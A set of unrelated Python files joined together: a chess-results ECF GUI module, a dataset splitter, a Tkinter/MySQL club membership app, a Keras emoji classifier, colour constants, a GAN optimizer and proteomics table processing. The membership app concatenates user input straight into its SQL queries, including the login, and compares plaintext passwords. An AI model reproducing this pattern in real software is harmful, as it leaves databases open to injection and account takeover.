self.update_players_to_ecf()
return "break"
def describe_buttons(self):
"""Define all action buttons that may appear on events page."""
self.define_button(
self._btn_dropevent,
text="Delete Event",
tooltip="Delete the selected event from the database.",
underline=2,
command=self.on_drop_event,
)
self.define_button(
self._btn_join_event_new_players,
text="Join Event New Players",
tooltip="Join new players with same same as earlier events.",
underline=0,
switchpanel=True,
command=self.on_join_event_new_players,
)
self.define_button(
self._btn_ecfplayers,
text="To ECF",
tooltip=(
"Update list of players with results for submission to ECF."
),
underline=1,
command=self.on_ecf_players,
)
self.define_button(
self._btn_exportevents,
text="Export Events",
tooltip=" ".join(
(
"Export event data in text format recognised by Import",
"Events.",
)
),
underline=1,
switchpanel=True,
command=self.on_export_events,
)
self.define_button(
self._btn_game_summary,
text="Game Summary",
tooltip="Show game summary for selected events.",
underline=2,
switchpanel=True,
command=self.on_game_summary,
)
self.define_button(
self._btn_event_summary,
text="Event Summary",
tooltip="Show event summary for selected events.",
underline=7,
switchpanel=True,
command=self.on_event_summary,
)
def show_event_panel_actions_allowed_buttons(self):
"""Specify buttons to show on events panel."""
self.hide_panel_buttons()
self.show_panel_buttons(
(
self._btn_dropevent,
self._btn_join_event_new_players,
self._btn_ecfplayers,
self._btn_exportevents,
self._btn_game_summary,
self._btn_event_summary,
)
)
def update_players_to_ecf(self):
"""Add players in event to players whose results to be sent to ECF."""
esel = self.eventgrid.selection
ebkm = self.eventgrid.bookmarks
update_events = []
for e in ebkm:
update_events.append(e)
for e in esel:
if e not in ebkm:
update_events.append(e)
if len(update_events) == 0:
dlg = tkinter.messagebox.showinfo(
parent=self.get_widget(),
message=" ".join(
(
"Cannot update lists of events and players for",
"submission to ECF when no events selected.",
)
),
title="Events",
)
return
else:
if len(update_events) == 1:
txt = "One event"
else:
txt = " ".join((str(len(update_events)), "events"))
if not tkinter.messagebox.askyesno(
parent=self.get_widget(),
message=" ".join(
(
txt,
"selected for updating lists of events and",
"players for submission to ECF.\nDo",
"you wish to continue?",
)
),
title="Events",
):
return
mapclub = ecfmaprecord.ECFmapDBrecordClub()
mapplayer = ecfmaprecord.ECFmapDBrecordPlayer()
db = self.get_appsys().get_results_database()
ccount = 0
pcount = 0
db.start_transaction()
mapclubcursor = db.database_cursor(
filespec.MAPECFCLUB_FILE_DEF, filespec.PLAYERALIASID_FIELD_DEF
)
try:
mapplayercursor = db.database_cursor(
filespec.MAPECFPLAYER_FILE_DEF, filespec.PERSONID_FIELD_DEF
)
try:
for event in update_events:
games = resultsrecord.get_games_for_event(
db,
resultsrecord.get_event_from_record_value(
db.get_primary_record(
filespec.EVENT_FILE_DEF, event[-1]
)
),
)
players = resultsrecord.get_players(
db, resultsrecord.get_aliases_for_games(db, games)
)
persons = resultsrecord.get_persons(db, players)
for p in players:
skey = db.encode_record_number(players[p].key.recno)
r = mapclubcursor.nearest(skey)
if r is not None:
if db.encode_record_selector(r[0]) == skey:
continue
mapclub.empty()
mapclub.value.playerkey = repr(players[p].key.recno)
mapclub.value.playername = players[
p
].value.identity_packed()
mapclub.key.recno = None
mapclub.put_record(db, filespec.MAPECFCLUB_FILE_DEF)
ccount += 1
# DPT database engine returns new cursor with fresh
# recordset. bsddb and sqlite3 database engines return
# mapclubcursor but do nothing else.
mapclubcursor = db.repair_cursor(
mapclubcursor,
filespec.MAPECFCLUB_FILE_DEF,
filespec.PLAYERALIASID_FIELD_DEF,
)
for p in persons:
skey = db.encode_record_number(persons[p].key.recno)
r = mapplayercursor.nearest(skey)
if r is not None:
if db.encode_record_selector(r[0]) == skey:
continue
mapplayer.empty()
mapplayer.value.playerkey = repr(persons[p].key.recno)
mapplayer.value.playername = persons[
p
].value.identity_packed()
mapplayer.key.recno = None
mapplayer.put_record(
db, filespec.MAPECFPLAYER_FILE_DEF
)
pcount += 1
# DPT database engine returns new cursor with fresh
# recordset. bsddb and sqlite3 database engines return
# mapplayercursor but do nothing else.
mapplayercursor = db.repair_cursor(
mapplayercursor,
filespec.MAPECFPLAYER_FILE_DEF,
filespec.PERSONID_FIELD_DEF,
)
finally:
mapplayercursor.close()
finally:
mapclubcursor.close()
# if ccount or pcount:
# db.commit()
db.commit()
if pcount:
pmsg = " ".join(
(
str(pcount),
"players added to list of players awaiting",
"attachment to grading codes",
)
)
self.refresh_controls(
(
(
db,
filespec.MAPECFPLAYER_FILE_DEF,
filespec.PERSONMAP_FIELD_DEF,
),
)
)
else:
pmsg = " ".join(
(
"No players needed adding to list of players awaiting",
"attachment to grading codes",
)
)
if ccount:
cmsg = " ".join(
(
str(ccount),
"players added to list of players awaiting",
"attachment to ECF clubs",
)
)
self.refresh_controls(
(
(
db,
filespec.MAPECFCLUB_FILE_DEF,
filespec.PLAYERALIASMAP_FIELD_DEF,
),
)
)
else:
cmsg = " ".join(
(
"No players needed adding to list of players awaiting",
"attachment to ECF clubs",
)
)
dlg = tkinter.messagebox.showinfo(
parent=self.get_widget(),
message="\n".join((pmsg, cmsg)),
title="Events",
)
|
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import pdb
loc_gt = np.loadtxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only.txt', dtype=str)
np.random.seed(1)
X = loc_gt
def dist_from_arr(arr):
dist = np.array(np.unique(arr, return_counts=True)).T[:,1]
return dist/np.sum(dist)
def kl_divergence(dist1,dist2):
return np.sum(dist1*np.log(dist1/dist2))
# all_frames = np.array(list(dict.fromkeys(X[:,0]).keys())) # preserves order in extracting sets
all_frames = X
all_classes = np.array(list(map(lambda x: x.split('/')[0], X)))
set_classes = dict(zip(sorted(list(set(all_classes))), np.arange(len(set(all_classes)))))
all_classes = np.array([set_classes[all_classes[i]] for i in range(len(all_classes))])
divergence = 100
max_diff = 1
X_train, X_test = None, None
while divergence > 0.005: # forcing distribution to be very similar
perm = np.random.permutation(np.arange(len(all_classes)))
all_frames, all_classes = all_frames[perm], all_classes[perm]
train_frames, test_frames = all_frames[:int(len(all_frames)*0.8)], all_frames[int(len(all_frames)*0.8):]
X_train, X_test = train_frames, test_frames
train_classes, test_classes = all_classes[:int(len(all_classes)*0.8)], all_classes[int(len(all_classes)*0.8):]
dist1, dist2 = dist_from_arr(train_classes), dist_from_arr(test_classes)
if np.min(dist1)<1e-5 or np.min(dist2)<1e-5:
pass
elif dist1.size == dist2.size:
divergence = kl_divergence(dist1, dist2)
print(divergence)
# X_train.to_csv('../../datasets/train_.csv',index=False)
# X_test.to_csv('../../datasets/test_.csv',index=False)
np.savetxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only_train.txt', X_train, fmt='%s')
np.savetxt('../../../../datasets/LogosInTheWild-v2/LogosClean/commonformat/ImageSets/top_only_test.txt', X_test, fmt='%s') |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.12
# In conjunction with Tcl version 8.6
# Apr 15, 2018 05:51:30 AM
import sys
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
from tkinter import messagebox
import MySQLdb
#dataBase connection
db = MySQLdb.connect(host='somebody',user='else',passwd='s',db='lover')
cur = db.cursor()
def set_Tk_var():
global txtLoginSchoolID
txtLoginSchoolID = StringVar()
global txtLoginPassword
txtLoginPassword = StringVar()
global txtAddUID
txtAddUID = StringVar()
global txtAddName
txtAddName = StringVar()
global txtAddSurname
txtAddSurname = StringVar()
global txtAddSchoolID
txtAddSchoolID = StringVar()
global txtAddPhone
txtAddPhone = StringVar()
global txtLabelAddInfo
txtLabelAddInfo = StringVar()
global txtEditNum
txtEditNum = StringVar()
global txtEditUID
txtEditUID = StringVar()
global txtEditName
txtEditName = StringVar()
global txtEditSurname
txtEditSurname = StringVar()
global txtEditSchoolID
txtEditSchoolID = StringVar()
global txtEditPhone
txtEditPhone = StringVar()
global editCheck
editCheck = StringVar()
global txtLabelEditInfo
txtLabelEditInfo = StringVar()
global txtCreateEventName
txtCreateEventName = StringVar()
global txtCreateSociety
txtCreateSociety = StringVar()
global txtCreateDate
txtCreateDate = StringVar()
global txtLabelCreateInfo
txtLabelCreateInfo = StringVar()
global combobox
combobox = StringVar()
global txtAttendanceInfo
txtAttendanceInfo = StringVar()
global txtAttendUID
txtAttendUID = StringVar()
def buttonAddReturn(p1):
pushAddMemberButton()
def loginButtonReturn(p1):
pushLoginButton()
def pushLoginButton():
if(txtLoginSchoolID.get()=="" or txtLoginPassword.get()==""):
if(txtLoginSchoolID.get()==""):
messagebox.showwarning("Empty School ID","Enter a School ID")
else:
messagebox.showwarning("Empty Password","Enter a password")
if(txtLoginSchoolID.get()!=""):
command = "SELECT * FROM userList WHERE schoolID ="+txtLoginSchoolID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
if (txtLoginPassword.get()==password):
if(admin==b'\x01'):
messagebox.showinfo("Admin Login","Welcome "+name+" "+surname)
w.frameLogin.pack()
w.menubar.entryconfigure("Member Operations",state="normal")
w.menubar.entryconfigure("Event Operations",state="normal")
w.menubar.entryconfig("Change Password",state="normal")
else:
messagebox.showinfo("User Login","Welcome "+name+" "+surname)
w.frameLogin.pack()
w.menubar.entryconfig("Change Password",state="normal")
else:
if(txtLoginPassword.get()!=""):
messagebox.showwarning("error!","Wrong password or schoolID")
else:
messagebox.showwarning("error!","Wrong password or schoolID")
def addUIDReturn(p1):
command = "SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
messagebox.showwarning("Member Already Registered!",name+surname+" is already on the list!")
txtAddUID.set("")
w.TEntry3.focus()
else:
w.TEntry4.focus()
def pushAddMember():
w.frameAddMember.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.TEntry3.focus()
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
txtAddPhone.set("")
txtAddName.set("")
txtAddSchoolID.set("")
txtAddUID.set("")
txtAddSurname.set("")
def pushAttendanceOK():
if(combobox.get()!=""):
w.frameTakeAttend.place(relx=0.3, rely=0.3, relheight=0.35, relwidth=.5)
vals = combobox.get().strip().split(" ")
global ID
ID = int(vals[2])
else:
messagebox.showerror("Choose","Choose event")
def pushChangePassword():
print('member_support.pushChangePassword')
sys.stdout.flush()
def pushCreateEvent():
w.frameCreateEvent.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
w.TEntry14.focus()
txtCreateEventName.set("")
txtCreateDate.set("")
txtCreateSociety.set("")
def pushButtonCreateEvent():
command = "INSERT INTO eventList (name, society, date, members) VALUES ('"+txtCreateEventName.get()+"', '"+txtCreateSociety.get()+"', '"+txtCreateDate.get()+"', ' ');"
cur.execute(command)
db.commit()
messagebox.showinfo("Created","Event created")
def pushEditCheck():
if(editCheck.get()=="1"):
w.entryEditName.configure(state="normal")
w.entryEditUID.configure(state="normal")
w.entryEditSurname.configure(state="normal")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="normal")
else:
w.entryEditName.configure(state="disabled")
w.entryEditUID.configure(state="disabled")
w.entryEditSurname.configure(state="disabled")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="disabled")
def editUIDSchoolReturn(p1):
command = "SELECT * FROM memberList WHERE UID ="+txtEditNum.get()+";"
cur.execute(command)
results = cur.fetchall()
command = "SELECT * FROM memberList WHERE schoolID ="+txtEditNum.get()+";"
cur.execute(command)
results1= cur.fetchall()
if(results!=() or results1!=()):
if(results!=()):
for row in results:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
phone = row[4]
else:
for row in results1:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
phone = row[4]
txtEditName.set(name)
txtEditSurname.set(surname)
txtEditSchoolID.set(schoolID)
txtEditUID.set(UID)
txtEditPhone.set(phone)
else:
messagebox.showerror("Not Found!","Member not found!")
def pushEditMember():
w.frameEditMember.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.entryEditName.configure(state="disabled")
w.entryEditUID.configure(state="disabled")
w.entryEditSurname.configure(state="disabled")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="disabled")
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
w.TEntry8.focus()
txtEditNum.set("")
txtEditName.set("")
txtEditSurname.set("")
txtEditSchoolID.set("")
txtEditUID.set("")
txtEditPhone.set("")
editCheck.set("0")
def pushEditRemove():
if(editCheck.get()!='1'):
if(txtEditSchoolID.get()!=""):
if (messagebox.askokcancel("Continue?","Member will be deleted?")):
command = "DELETE FROM memberList WHERE schoolID ="+txtEditSchoolID.get()+";"
cur.execute(command)
db.commit()
messagebox.showinfo("Succesful!","Succesfully deleted!")
txtEditName.set("")
txtEditSurname.set("")
txtEditSchoolID.set("")
txtEditUID.set("")
txtEditPhone.set("")
else:
messagebox.showwarning("Error","Empty School ID!")
else:
messagebox.showwarning("Error","You are in editing mode!")
w.TCheckbutton1.focus()
def pushEditSave():
if(editCheck.get()=='1'):
if (messagebox.askokcancel("Continue?","New credientals will be saved?")):
command="UPDATE memberList SET UID='"+txtEditUID.get()+"', name='"+txtEditName.get()+"', surname='"+txtEditSurname.get()+"', phone='"+txtEditPhone.get()+"' WHERE schoolID="+txtEditSchoolID.get()+";"
cur.execute(command)
db.commit()
else:
messagebox.showwarning("Error","You are not in editing mode")
def pushEventList():
print('member_support.pushEventList')
sys.stdout.flush()
def pushAddMemberButton():
adder = txtAddUID.get()+", '"+txtAddName.get()+"', '"+txtAddSurname.get()+"', "+txtAddSchoolID.get()+", '"+txtAddPhone.get()
command = "SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
messagebox.showwarning("Member Already Registered!",name+" "+surname+" is already on the list!")
txtAddUID.set("")
txtAddName.set("")
txtAddPhone.set("")
txtAddSurname.set("")
txtAddSchoolID.set("")
w.TEntry3.focus()
else:
command = "INSERT INTO memberList (UID, name, surname, schoolID, phone) VALUES ("+adder+"');"
cur.execute(command)
db.commit()
command="SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
messagebox.showinfo("Success!",UID+" "+name+" "+surname)
else:
messagebox.showerror("Error","Error not added!")
txtLabelAddInfo.set(name+" "+surname+" added")
txtAddName.set("")
txtAddPhone.set("")
txtAddSchoolID.set("")
txtAddSurname.set("")
txtAddUID.set("")
w.TEntry3.focus()
def pushLogout():
w.frameLogin.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
txtLoginSchoolID.set("")
txtLoginPassword.set("")
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="disabled")
w.TEntry1.focus()
def pushMainMenu():
w.frameLogin.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameAddMember.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameAttendance.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameCreateEvent.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameEditMember.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.framePassword.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameTakeAttend.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.menubar.entryconfigure("Member Operations",state="normal")
w.menubar.entryconfigure("Event Operations",state="normal")
w.menubar.entryconfig("Change Password",state="normal")
w.menubar.entryconfig("Main Menu",state="disabled")
def pushMemberList():
print('member_support.pushMemberList')
sys.stdout.flush()
def pushSavePassword():
print('member_support.pushSavePassword')
sys.stdout.flush()
def pushTakeAttend():
w.frameAttendance.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
command = "SELECT date, name, ID FROM eventList;"
cur.execute(command)
results = cur.fetchall()
w.value_list=results
w.TCombobox1.configure(values=w.value_list)
def takeAttendUIDReturn(p1):
command = "SELECT * FROM memberList WHERE UID ='"+txtAttendUID.get()+"';"
print(txtAttendUID.get())
cur.execute(command)
results = cur.fetchall()
for row in results:
name = row[1]
surname = row[2]
print(results)
if(results!=()):
for row in results:
schoolID = row[3]
command = "SELECT * FROM eventList WHERE ID ="+str(ID)+";"
cur.execute(command)
results = cur.fetchall()
print(results)
for row in results:
members = row[4]
command="UPDATE eventList SET members='"+str(members)+"' '"+" "+str(schoolID)+"' WHERE ID='"+str(ID)+"';"
cur.execute(command)
db.commit()
txtAttendanceInfo.set(name + " " +surname+" added!")
txtAttendUID.set("")
w.TEntry17.focus()
else:
messagebox.showerror("Not on the list","UID not on the list")
def init(top, gui, *args, **kwargs):
global w, top_level, root
w = gui
top_level = top
root = top
def destroy_window():
# Function which closes the window.
global top_level
top_level.destroy()
top_level = None
if __name__ == '__main__':
import member
member.vp_start_gui()
|
import numpy as np
from utils import *
from keras.models import Model
from keras.layers import Dense, Input, Dropout, LSTM, Activation
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.initializers import glorot_uniform
maxLen = 10
X_train, Y_train = read_csv("Data/train_emoji.csv")
X_test, Y_test = read_csv("Data/tesss.csv")
idx_to_word, word_to_idx, word_to_vec_map = read_glove_vecs("Data/glove.6B.50d.txt")
def sentence_to_indices(X, word_to_idx, max_len):
m = X.shape[0]
sentence_indices = np.zeros((m, max_len))
for j in range(m):
words = X[j].lower().split()
index = 0
for word in words:
sentence_indices[j][index] = word_to_idx[word]
index += 1
return sentence_indices
def pretrained_embedding_layer(word_to_vec_map, word_to_idx):
vocab_len = len(word_to_idx) + 1 # adding 1 to fit keras embeddings (Mandatory)
emb_dim = word_to_vec_map["cucumber"].shape[0] # 50
emb_matrix = np.zeros((vocab_len, emb_dim))
for word, index in word_to_idx.items():
emb_matrix[index, :] = word_to_vec_map[word]
embedding_layer = Embedding(vocab_len, emb_dim, trainable = False)
embedding_layer.build((None,))
embedding_layer.set_weights([emb_matrix])
return embedding_layer
def Emojify_V2(input_shape, word_to_vec_map, word_to_idx):
sentence_indices = Input(shape=input_shape, dtype=np.int32)
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_idx)
embeddings = embedding_layer(sentence_indices)
X = LSTM(128, return_sequences=True)(embeddings)
X = Dropout(0.5)(X)
X = LSTM(128, return_sequences=False)(X)
X = Dropout(0.5)(X)
X = Dense(5)(X)
X = Activation("softmax")(X)
model = Model(sentence_indices, X)
return model
if __name__ == "__main__":
# X1 = np.array(["funny lol", "lets play baseball", "food is ready for you"])
# X1_indices = sentence_to_indices(X1,word_to_idx, max_len = 5)
# print("X1 =", X1)
# print("X1_indices =", X1_indices)
# print(len(word_to_idx))
# embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_idx)
# print("weights[0][1][3] =", embedding_layer.get_weights()[0][1][3])
model = Emojify_V2((maxLen,), word_to_vec_map, word_to_idx)
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentence_to_indices(X_train, word_to_idx, maxLen)
Y_train_oh = convert_to_one_hot(Y_train, C=5)
model.fit(X_train_indices, Y_train_oh, epochs = 100, batch_size=128, shuffle=True)
X_test_indices = sentence_to_indices(X_test, word_to_idx, maxLen)
Y_test_oh = convert_to_one_hot(Y_test, C=5)
loss, acc = model.evaluate(X_test_indices, Y_test_oh)
print()
print("Test Accuracy = ", acc)
# Change the sentence below to see your prediction. Make sure all the words are in the Glove embeddings.
x_test = np.array(["i want some coffee"])
X_test_indices = sentence_to_indices(x_test, word_to_idx, maxLen)
print(x_test[0] +' '+ label_to_emoji(np.argmax(model.predict(X_test_indices))))
|
# Stopwatch colors
BLACK = 0x000000
WHITE = 0xFFFFFF
GRAY = 0x888888
LIGHT_GRAY = 0xEEEEEE
DARK_GRAY = 0x484848
ORANGE = 0xFF8800
DARK_ORANGE = 0xF18701
LIGHT_BLUE = 0x5C92D1
BLUE = 0x0000FF
GREEN = 0x00FF00
PASTEL_GREEN = 0x19DF82
SMOKY_GREEN = 0x03876D
YELLOW = 0xFFFF00
MELLOW_YELLOW = 0xF4ED06
RED = 0xFF0000
DARK_RED = 0xDE0A07
PINK = 0xFFC0CB
PURPLE = 0x952489
DEEP_PURPLE = 0x890C32
BROWN = 0x9B3E25 |
#From https://gist.github.com/EndingCredits/b5f35e84df10d46cfa716178d9c862a3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.framework import ops
from tensorflow.python.training import optimizer
import hyperchamber as hc
import inspect
class SocialOptimizer(optimizer.Optimizer):
def __init__(self, learning_rate=0.001, p=0.1, gan=None, config=None, use_locking=False, name="SocialOptimizer", optimizer=None, rho=1, beta=1, gamma=1):
"""https://arxiv.org/pdf/1803.03021.pdf"""
super().__init__(use_locking, name)
self.gan = gan
self.config = config
self._lr_t = learning_rate
self.optimizer = self.gan.create_optimizer(optimizer)
def _prepare(self):
super()._prepare()
self.optimizer._prepare()
def _create_slots(self, var_list):
super()._create_slots(var_list)
self.optimizer._create_slots(var_list)
def _apply_dense(self, grad, var):
return self.optimizer._apply_dense(grad, var)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
var_list = [ v for _,v in grads_and_vars]
d_vars = []
g_vars = []
for grad,var in grads_and_vars:
if var in self.gan.d_vars():
d_vars += [var]
elif var in self.gan.g_vars():
g_vars += [var]
else:
raise("Couldn't find var in g_vars or d_vars")
w = [tf.Variable(self.config.start_at or 0.0), tf.Variable(self.config.start_at or 0.0)]
Vidv = [self.gan.trainer.d_loss, self.gan.trainer.g_loss]
#Vsoc = [1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss, -1/2. * self.gan.trainer.d_loss - 1/2.* self.gan.trainer.g_loss]
Vsoc = [1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss, 1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss]
wlr = self.config.w_learn_rate or 0.01
wt1 = [w[0] + wlr * (Vidv[0] - Vsoc[0]), w[1] + wlr * (Vidv[1] - Vsoc[1])]
def clamped(net):
return tf.maximum(self.config.min or 0., tf.minimum(net, self.config.max or 1.))
self._prepare()
wt1 = [clamped(wt1[0]),clamped(wt1[1])]
self.gan.add_metric('wt0', wt1[0])
self.gan.add_metric('wt1', wt1[1])
op1 = tf.group(*[tf.assign(w, v) for w,v in zip(w, wt1)]) # store variables
with tf.get_default_graph().control_dependencies([op1]):
Vi = [(1. - w[0]) * Vidv[0] + w[0] * Vsoc[0],
(1. - w[1]) * Vidv[1] + w[1] * Vsoc[1]]
if self.config.reverse_w:
Vi = [(w[0]) * Vidv[0] + (1.0-w[0]) * Vsoc[0],
(w[1]) * Vidv[1] + (1.0-w[1]) * Vsoc[1]]
self.gan.add_metric('w0', w[0])
self.gan.add_metric('w1', w[1])
new_grads = tf.gradients(Vi[0], d_vars) + tf.gradients(Vi[1], g_vars)
self.gan.trainer.d_loss = Vi[0]
self.gan.trainer.g_loss = Vi[1]
new_grads_and_vars = list(zip(new_grads, var_list)).copy()
op3 = self.optimizer.apply_gradients(new_grads_and_vars.copy(), global_step=global_step, name=name)
with tf.get_default_graph().control_dependencies([op3]):
if(self.config.w_l1):
# return to selfish state
wt1 = [wt1[0] + self.config.w_l1 * ((self.config.l1_default or 0.0)-wt1[0]),
wt1[1] + self.config.w_l1 * ((self.config.l1_default or 0.0)-wt1[1])]
op4 = tf.group(*[tf.assign(w, v) for w,v in zip(w, wt1)]) # store variables
with tf.get_default_graph().control_dependencies([op4]):
self.gan.add_metric('l1w0', w[0])
self.gan.add_metric('l1w1', w[1])
return tf.no_op()
else:
return tf.no_op()
def _apply_sparse(self, grad, var):
raise NotImplementedError("Sparse gradient updates are not supported.")
def variables(self):
return self.optimizer.variables()
|
from collections import OrderedDict as odict
import numpy as np
import pandas as pd
import maspy.peptidemethods
import maspy.proteindb
def write_evidence_table(ev, path):
""" Write an updated evidence table file. """
columns = [
'Sequence', 'Modified sequence', 'Sequence start', 'Sequence end',
'Protein Systematic Name', 'Protein Standard Name', 'Phospho (STY)',
'Phospho positions', 'Phospho sites', 'Protein phospho sites',
'Ratio Log2 normalized', 'Ratio Log2', 'Combined Phospho Probability',
'Valid Quantification', 'Raw file', 'Experiment', 'Setup',
'Reverse', 'Potential contaminant', 'S/T-P motif',
]
ev.ix[:, columns].to_csv(path, sep='\t', index=False)
def write_phosphosite_table(ev, path, prob_cutoff=0):
""" Write a phosphosite table. """
m = np.all([
ev['Valid Quantification'],
ev['Phospho (STY)'] > 0,
ev['Combined Phospho Probability'] >= prob_cutoff,
], axis=0)
headers = [
'Protein Standard Name', 'Protein Systematic Name',
'Phospho (STY)', 'Ratio Log2 normalized',
'Phospho positions', 'Phospho sites', 'S/T-P motif', 'Setup'
]
aggregation = odict([(h, 'first') for h in headers])
aggregation['Ratio Log2 normalized'] = 'mean'
groupby = ['Experiment', 'Protein phospho sites']
phospho_table = ev[m].groupby(groupby, as_index=False).agg(aggregation)
phospho_table.to_csv(path, sep='\t', index=False)
def write_protein_table(ev, path):
""" Write a protein table. """
m = ev['Valid Quantification'] & (ev['Phospho (STY)'] == 0)
headers = ['Protein Systematic Name', 'Ratio Log2 normalized', 'Setup']
aggregation = odict([(h, 'first') for h in headers])
aggregation['Ratio Log2 normalized'] = 'mean'
groupby = ['Experiment', 'Protein Standard Name']
protein_table = ev[m].groupby(groupby, as_index=False).agg(aggregation)
protein_table.to_csv(path, sep='\t', index=False)
def process_evidence(evidence, fasta):
""" Read and process a MaxQuant evidence file. """
ev = pd.read_csv(evidence, sep='\t')
_adjust_mq_version_headers(ev)
proteindb = import_mq_proteindb(fasta)
_add_contamination(ev, '[cont]')
_add_decoy(ev, 'REV__')
_add_proline_count(ev)
_add_protein_names(ev, proteindb)
_add_peptide_positions(ev, proteindb)
_change_mod_sequence(ev)
_add_protein_phospho_annotation(ev, proteindb)
_add_stp_motif(ev, proteindb)
_add_combined_probability(ev)
_add_valid_quant(ev)
_add_log_ratio(ev)
ev, normalization_data = _normalize_ratios(ev)
return ev, normalization_data
def reverse_ratios(ev, experiments):
""" Invert log transformed ratios of the specified experiments. """
for exp in experiments:
m = (ev['Experiment'] == exp) & ev['Valid Quantification']
ev.loc[m, 'Ratio Log2 normalized'] *= -1
def normalize_protein_abundance(ev, protein):
""" Normalize peptide log ratios of protein by the protein abundance.
Peptides are normalized by subtracting the median log ratio of all
non-phosphorylated peptides.
"""
for exp in np.unique(ev['Experiment']):
target_mask = np.all([
ev['Valid Quantification'], ev['Experiment'] == exp,
ev['Protein Standard Name'] == protein,
], axis=0)
norm_mask = (ev['Phospho (STY)'] == 0) & target_mask
median = np.median(ev['Ratio Log2 normalized'][norm_mask])
ev.loc[target_mask, 'Ratio Log2 normalized'] -= median
def import_mq_proteindb(fastapath):
proteindb = maspy.proteindb.importProteinDatabase(
fastapath, minLength=4, maxLength=50, missedCleavage=10,
ignoreIsoleucine=True, headerParser=maspy.proteindb.fastaParseSgd
)
# In contrary to MasPy, MaxQuant ignores Leucine and replaces "L" with "I"
for peptide in list(proteindb.peptides):
new_peptide = peptide.replace('L', 'I')
if new_peptide not in proteindb.peptides:
proteindb.peptides[new_peptide] = proteindb.peptides[peptide]
# Add protein Standard Name EPO1 for YMR124W
proteindb['YMR124W'].name = 'EPO1'
return proteindb
def _add_protein_phospho_annotation(ev, proteindb):
m = (ev['Phospho (STY)'] != 0) & (ev['Reverse'] != '+')
all_phospho_positions = []
all_phospho_sites = []
all_protein_phospho_sites = []
for row_id, row in ev[m].iterrows():
protein = row['Leading Razor Protein']
protein_std = proteindb.proteins[protein].name
start, end = proteindb.peptides[row['Sequence']].proteinPositions[protein]
mod_positions = maspy.peptidemethods.returnModPositions(
row['Modified sequence'], indexStart=start
)
phospho_site_list = list()
for phospho_pos in mod_positions['ph']:
aa = proteindb.proteins[protein].sequence[phospho_pos - 1]
site_string = str(phospho_pos) + '(' + aa + ')'
phospho_site_list.append(site_string)
phospho_positions = ','.join([str(i) for i in mod_positions['ph']])
all_phospho_positions.append(phospho_positions)
phospho_sites = ' / '.join(phospho_site_list)
all_phospho_sites.append(phospho_sites)
protein_phospho_sites = ' - '.join([protein_std, phospho_sites])
all_protein_phospho_sites.append(protein_phospho_sites)
ev['Phospho positions'] = ''
ev.loc[m, 'Phospho positions'] = all_phospho_positions
ev['Phospho sites'] = ''
ev.loc[m, 'Phospho sites'] = all_phospho_sites
ev['Protein phospho sites'] = ''
